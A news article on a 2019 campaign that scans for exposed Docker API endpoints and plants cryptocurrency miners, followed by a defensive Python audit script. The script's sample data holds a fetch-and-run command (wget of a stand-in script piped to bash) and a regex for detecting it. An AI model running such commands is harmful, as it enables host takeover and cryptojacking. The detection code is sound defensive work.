A hacking group has begun mass-scanning the internet for Docker platforms whose API endpoints are exposed online. The scanning started on Nov 24, 2019 and was noticed immediately because of its sheer size; this does not look like an average script-kiddie attempt.
The goal of these mass-scans is to let the attackers send commands to the Docker daemon and run a cryptocurrency miner on the victim's Docker instances, raising funds for themselves.
At the time of writing, the group behind these attacks is scanning more than 60,000 IP netblocks for exposed Docker instances. As soon as the attackers find an exposed host, they use the API endpoint to start an Alpine Linux container that runs the commands of their choosing.
Some of those commands download and execute a Bash script from the attackers' servers; the script then installs and starts an XMRig cryptocurrency miner. Within just four days of operation, the attackers had mined more than 15 Monero (XMR), worth more than USD 750.
The malware also has a self-defense mechanism: it uninstalls any monitoring agents it recognises and terminates a number of processes via a script fetched from a specific website ( http://ix[.]io/1XQh).
Inspecting that script shows that the attackers disable security tools, kill processes belonging to rival crypto-mining botnets such as DDG, create backdoor accounts on the compromised containers, and add SSH keys so they can get back in without any trouble.
For now, users and organisations running Docker are advised to check immediately whether their API endpoints are exposed to the internet, to close those ports, and to remove any running containers they do not recognise.
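The two checks recommended above can be turned into a local audit. The script below is an added example written for this article, not code from the researchers who reported the campaign or from the Docker project. It reads the daemon's `daemon.json` (the `hosts` and `tlsverify` keys are real Docker daemon settings) and flags a TCP API listener bound to a non-loopback address, which is exactly the exposure the scanners look for; it then walks a container inventory shaped like the Docker Engine API's `/containers/json` response and flags containers whose image is not on a deployment allowlist or whose entry command fetches a script from the network and runs it, the pattern the article describes for the Alpine containers. All sample data (the daemon config, the container list, the `example.invalid` URL and the allowlist) is constructed for the example. A real audit must also check the `-H` flags on the `dockerd` command line or systemd unit, which this example does not cover.

```python
"""Audit a Docker host for an exposed API listener and for containers that look
like the fetch-and-run Alpine containers described in the article.

Example code written for this article; not the Docker project's own tooling.
All sample inputs below are constructed.
"""
import json
import re
from urllib.parse import urlparse

# Heuristic for "download a script and execute it": curl/wget piped into a shell,
# or a shell run on the downloaded file after ';' or '&&'. Not a full shell parser.
FETCH_AND_RUN = re.compile(
    r"(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b"        # curl ... | sh
    r"|(?:curl|wget)\b[^;&]*(?:;|&&)\s*(?:ba)?sh\b"  # wget -O x ...; bash x
)

# Constructed daemon.json: a plaintext TCP listener on every interface, no TLS client auth.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "tlsverify": False,
})

# Constructed inventory in the shape of GET /containers/json (fields trimmed).
SAMPLE_CONTAINERS = [
    {"Id": "3f1a9c0d2b7e4a5f6c8d9e0f1a2b3c4d", "Names": ["/web-frontend"],
     "Image": "registry.example.com:5000/web:1.4.2",
     "Command": "nginx -g 'daemon off;'"},
    {"Id": "9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e", "Names": ["/elegant_morse"],
     "Image": "alpine:latest",
     "Command": "sh -c 'wget -q -O /tmp/x.sh http://example.invalid/x.sh; bash /tmp/x.sh'"},
]

# Constructed allowlist of images this host is supposed to run (registry/repo, no tag).
SAMPLE_ALLOWLIST = {"registry.example.com:5000/web"}


def exposed_api_listeners(daemon_json_text: str) -> list:
    """Return findings for dockerd TCP listeners reachable from other hosts."""
    cfg = json.loads(daemon_json_text)
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are not reachable over the network
        bind = urlparse(host).hostname or ""
        if bind in ("127.0.0.1", "localhost", "::1"):
            continue
        reason = "TCP API listener bound to a non-loopback address"
        if not tls_verify:
            reason += " without tlsverify (unauthenticated remote control of the daemon)"
        findings.append({"host": host, "reason": reason})
    return findings


def image_repo(image: str) -> str:
    """Strip the tag or digest from an image reference, keeping registry/repo."""
    name = image.split("@", 1)[0]
    slash, colon = name.rfind("/"), name.rfind(":")
    return name[:colon] if colon > slash else name


def suspicious_containers(containers: list, image_allowlist: set) -> list:
    """Flag containers not on the allowlist or whose command fetches and runs a script."""
    flagged = []
    for c in containers:
        reasons = []
        image = c.get("Image", "")
        if image_repo(image) not in image_allowlist:
            reasons.append(f"image {image!r} is not in the deployment allowlist")
        if FETCH_AND_RUN.search(c.get("Command", "")):
            reasons.append("entry command downloads and executes a script")
        if reasons:
            flagged.append({"id": c.get("Id", "")[:12],
                            "names": c.get("Names", []), "reasons": reasons})
    return flagged


def audit(daemon_json_text: str, containers: list, image_allowlist: set) -> dict:
    """Run both checks and return a report suitable for logging or alerting."""
    return {
        "exposed_api": exposed_api_listeners(daemon_json_text),
        "suspicious_containers": suspicious_containers(containers, image_allowlist),
    }


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_DAEMON_JSON, SAMPLE_CONTAINERS, SAMPLE_ALLOWLIST), indent=2))
```

On a live host, feed `audit()` the contents of `/etc/docker/daemon.json` and the output of `docker ps --format '{{json .}}'` converted to the field names used above; the allowlist should come from your deployment manifests, so that any container an attacker starts through the API stands out as unexpected even before its command is inspected.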